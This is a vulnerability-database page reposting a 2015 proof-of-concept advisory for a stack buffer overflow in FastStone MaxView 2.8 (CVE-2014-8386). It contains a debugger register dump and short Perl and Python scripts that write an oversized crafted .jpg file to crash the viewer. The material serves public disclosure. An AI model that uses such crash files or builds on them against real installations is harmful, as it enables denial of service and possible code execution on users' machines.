Vulmon Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

FastStone MaxView 2.8 Stack Overflow

Related Vulnerabilities: CVE-2014-8386  
Publish Date: 02 Jul 2015
Author: Hossein Hezami
Source 
                #######################################################################
# Title    : FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC
# Program  : FastStone MaxView
# Author   : Dr.3v1l
# Date     : 2015 01 July
# Website  : http://www.faststone.org
# Download : http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe
# Version  : 2.8
# Type     : (.jpg File) local Stack Overflow PoC
#######################################################################
#
# 01. Vulnerability Information
# 
# Class: Buffer overflow [CWE-119]
# Impact: Code execution
# Remotely Exploitable: No
# Locally Exploitable: Yes
# CVE Name: CVE-2014-8386
# 
# 02. Technical Description / Proof of Concept Code
# 
# This vulnerability is caused by a stack buffer overflow when parsing
# the display properties parameter. A malicious third party could trigger
# execution of arbitrary code within the context of the application, or
# otherwise crash the whole application.
#
# EAX 54A30018 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# ECX 0013D2A8
# EDX 7767D370 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 0013D2A8
# EBP 0013D30C
# ESI 0013D328
# EDI 000007A4
# EIP 7767D370 ntdll.KiFastSystemCallRet
# C 0  ES 0023 32bit 0(FFFFFFFF)
# P 1  CS 001B 32bit 0(FFFFFFFF)
# A 0  SS 0023 32bit 0(FFFFFFFF)
# Z 1  DS 0023 32bit 0(FFFFFFFF)
# S 0  FS 003B 32bit 7FFDF000(4000)
# T 0  GS 0000 NULL
# D 0
# O 0  LastErr ERROR_SUCCESS (00000000)
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -??? FFFF 000000FF 00FF00FF
# ST1 empty 4.7021112344749837450e+18
# ST2 empty 4.7021112344749837450e+18
# ST3 empty 4.7021112344749837450e+18
# ST4 empty 4.7021112344749837450e+18
# ST5 empty 4.7021112344749837450e+18
# ST6 empty 4.7021112344749837450e+18
# ST7 empty 4.7021112344749837450e+18
#                3 2 1 0      E S P U O Z D I
# FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
# FCW 127F  Prec NEAR,53  Mask    1 1 1 1 1 1
# 
# ---------------------------------------------------------------------
# 
# PoC (PERL) :
# 
#   my $file="3v1l.jpg";
#   open(my $FILE, ">>$file") or die "Cannot open $file: $!";
#   print $FILE "\x41" x 250000000;
#   close($FILE);
#   print "$file has been created \n";
# 
# 
# PoC (PYTHON) :
# 
#   file="3v1l.jpg"
#   junk="\x41"*250000000
#   writeFile = open (file, "w")
#   writeFile.write(junk)
#   writeFile.close()
#
#######################################################################
#
# [+] Contact Me :
#
#     B.Devils.B@gmail.com
#     Twitter.com/Doctor_3v1l
#     Twitter.com/blackdevilsb0ys
#     Facebook.com/blackdevilsb0ys
#     Linkedin.com/in/hossein3v1l
#     Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# Black_Devils B0ys - blackdevilsb0ys.ir
#######################################################################
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started